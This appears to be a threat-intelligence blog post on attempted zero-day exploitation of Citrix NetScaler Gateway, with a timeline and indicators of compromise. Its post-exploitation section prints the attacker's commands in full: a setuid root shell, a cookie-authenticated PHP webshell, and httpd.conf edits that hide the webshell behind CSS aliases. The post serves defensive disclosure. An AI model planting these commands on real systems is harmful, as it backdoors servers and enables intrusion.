Swarming Against Citrix 0-Day Exploitation
GreyNoise saw pre-disclosure exploitation of Citrix NetScaler CVE-2026-88771 three days before public disclosure.
On 24 September 2026, GreyNoise observed IP 149.104.78.141 attempting zero-day command-injection exploitation against a Citrix NetScaler Gateway sensor, more than three days before public disclosure of CVE-2026-88771 on 27 September. Behavioral detections labeled the activity malicious within seconds, and a CVE-specific tag deployed on 27 September retroactively matched those sessions. The attacker did not gain a foothold but tried to set setuid and setgid on /bin/sh, plant a cookie-authenticated PHP webshell, and hide it behind CSS aliases in the web server configuration. Patches are available, and GreyNoise did not publish the full exploitation chain.
- Exploitation attempts seen 24 September from 149.104.78.141, three days before disclosure.
- CVE-2026-88771 is a NetScaler Gateway login command-injection remote code execution flaw.
- The actor failed to compromise the sensor but exposed its post-exploitation playbook.
- Attempted a setuid root shell and a cookie-authenticated webshell hidden behind CSS aliases.
- Patches are available; GreyNoise withheld the full exploitation chain.
Vulnerabilities mentionedAll →
- CVE-2025-57779.3100%Out-of-Bounds Read (Memory Overread) in Citrix NetScaler ADC and Gatewaypublished · Citrix NetScaler ADC KEV ransomware
Indicators of compromiseauto-extracted · verify before use · export allAll →
| Type | Indicator | Context |
|---|---|---|
| ipv4 | 149.104.78.141 | r. On 24 September 2026, a malicious cyber actor (MCA) used 149.104.78.141 to attempt zero-day exploitation against a Citrix NetScaler |
| sha256 | 6f5a2a452a7901323abd21879c6cecccb47c06aeeaccb1b467212f3b11e4b1e7 | ell) receiver\\.min\\.[0-9a-f]+\\.css AliasMatch (Webshell) 6f5a2a452a7901323abd21879c6cecccb47c06aeeaccb1b467212f3b11e4b1e7 Webshell SHA-256 This article is a summary of the full, in- |
Full article755 words · extracted from greynoise.io · click to collapse
GreyNoise observes adversary activity through our Global Observation Grid (GOG), a network of sensors that draws attacker scanning and exploitation onto infrastructure we control. This lets us study adversary infrastructure, tooling, and tradecraft directly, without waiting for a victim investigation. GreyNoise also expands the GOG through Project Swarm, which enables the broader security community to join the effort. The activity discussed in this blog was derived from a Swarm participant sensor.
On 24 September 2026, a malicious cyber actor (MCA) used 149.104.78.141 to attempt zero-day exploitation against a Citrix NetScaler Gateway. At the time, there were no CVE-specific detections for the attack due to it occurring pre-disclosure. However, GreyNoise still detected and labeled the activity as fundamentally malicious within seconds due to behavioral detections. GreyNoise will not publish full details of the exploitation chain at this time. Patches are available and post-exploitation details are included below.
Timeline
TimelineTLP:CLEAR
Citrix NetScaler CVE-2026-88771
GreyNoise saw CVE-2026-88771 exploitation attempts on Sep 24, more than three days before public disclosure. The CVE-specific tag, deployed Sep 27, retro-tagged that activity.
7 dated events on 3 daysRetro-tagged as CVE-2026-88771 exploitationSelect a date to read it.
13 days42
Sep 24, 2026 · 07:32:08 UTC
Initial reconnaissance begins.
Intention is not known. Every Sep 24 entry here comes from this one IP address.
Sep 24, 2026 · 07:32:15 UTC
GreyNoise labeled the IP address suspicious due to methodology-based detection.
(Citrix ADC Gateway Login Panel Crawler)
Sep 24, 2026 · 07:32:19 UTC
GreyNoise labeled the IP address malicious.
(Generic ${IFS} Use in RCE Attempt; CitrixBleed 2 CVE-2025-5777 Attempt)
Sep 24, 2026 · 07:32:19 UTCRetro-tagged as CVE-2026-88771 exploitation
GreyNoise observed CVE-2026-88771 exploitation attempts from this IP address.
(Citrix NetScaler CVE-2026-88771 Login Command Injection RCE Attempt) Retro-tagged after the tag's Sep 27 deployment: 3 sessions, 07:32:19 to 07:32:20 UTC.
Sep 27, 2026 · 15:51:00 UTC
Public disclosure of CVE-2026-88771.
Sep 27, 2026 · 20:28:39 UTC
GreyNoise deployed the CVE-specific tag.
(Citrix NetScaler CVE-2026-88771 Login Command Injection RCE Attempt) Its retro hunt of stored sessions tagged only the Sep 24 activity.
Source: CVE record; GreyNoise.
Times are UTC.
Post-Exploitation
Though the adversary was unsuccessful in gaining a foothold on the targeted Swarm sensor, their post-exploitation playbook was revealed.
The MCA attempted to set both the Set User ID (setuid) and Set Group ID (setgid) bits on /bin/sh to obtain a root shell and install a password-protected webshell that accepts communication by the cookie value sent by the adversary. This may be to avoid persisting their commands in web logs. The MCA then attempted to configure the web server to treat their installed dot file (.ctxs.receiver - hidden by default) as a PHP file despite not having a .php extension. The MCA tried to create an alias which would route requests for a non-existent cascading style sheet (CSS) (receiver.min.css) to .ctxs.receiver; the MCA also attempted to create an additional AliasMatch setting which would provide similar functionality but allow for a more flexible pattern match so that variable characters added to the receiver.min.[0-9a-f].css file path would still route to the webshell. Lastly, the adversary attempted to kill the httpd process to restart the server.
chmod 6555 /bin/sh
mkdir -p /var/netscaler/logon/LogonPoint/custom
cat > /var/netscaler/logon/LogonPoint/custom/.ctxs.receiver <<'EOF'<?php header("Cache-Control: no-store, no-cache, must-revalidate");header("Pragma: no-cache");header("Expires: 0");if($_COOKIE["CsrfToken"]==="<REDACTED>"&&!empty($_COOKIE["NSC_TASS"]))passthru(urldecode($_COOKIE["NSC_TASS"])); ?>
EOFgrep -q ctxs.receiver /etc/httpd.conf || perl -ni -e 'if(!$d && m#Alias /logon/ "/var/netscaler/logon/"#){print qq( <Files ".ctxs.receiver">\n SetHandler application/x-httpd-php\n Header always set Cache-Control \"no-store, no-cache, must-revalidate\"\n Header always set Pragma \"no-cache\"\n </Files>\n Alias /logon/LogonPoint/custom/receiver.min.css "/var/netscaler/logon/LogonPoint/custom/.ctxs.receiver"\n AliasMatch ^/logon/LogonPoint/custom/receiver\\.min\\.[0-9a-f]+\\.css\$ \"/var/netscaler/logon/LogonPoint/custom/.ctxs.receiver\"\n);$d=1} print' /etc/httpd.confgrep -q 'AliasMatch .*receiver.min' /etc/httpd.conf || perl -ni -e 'if(!$d && m#Alias /logon/LogonPoint/custom/receiver.min.css#){print; print qq( AliasMatch ^/logon/LogonPoint/custom/receiver\\.min\\.[0-9a-f]+\\.css\$ \"/var/netscaler/logon/LogonPoint/custom/.ctxs.receiver\"\n);$d=1; next} print' /etc/httpd.confperl -pi -e 's/php_flag engine off/php_flag engine on /' /etc/httpd.confkill -HUP `cat /var/run/httpd.pid`
Indicators of Compromise
There are other indicators being shared in the community at a higher Traffic Light Protocol (TLP) level than we can put in this blog; none of the indicator sets should be considered exhaustive. Due to the nature of the vulnerability, adversaries have a wide range of options to poison server logs with variable malicious payloads as part of the exploitation sequence.
| Indicator | Description |
|---|---|
| 149.104.78.141 | Exploitation |
| /var/netscaler/logon/LogonPoint/custom/.ctxs.receiver | Webshell Path (Disk) |
| receiver.min.css | Alias (Webshell) |
| receiver\\.min\\.[0-9a-f]+\\.css | AliasMatch (Webshell) |
| 6f5a2a452a7901323abd21879c6cecccb47c06aeeaccb1b467212f3b11e4b1e7 | Webshell SHA-256 |
This article is a summary of the full, in-depth version on the GreyNoise Labs blog.
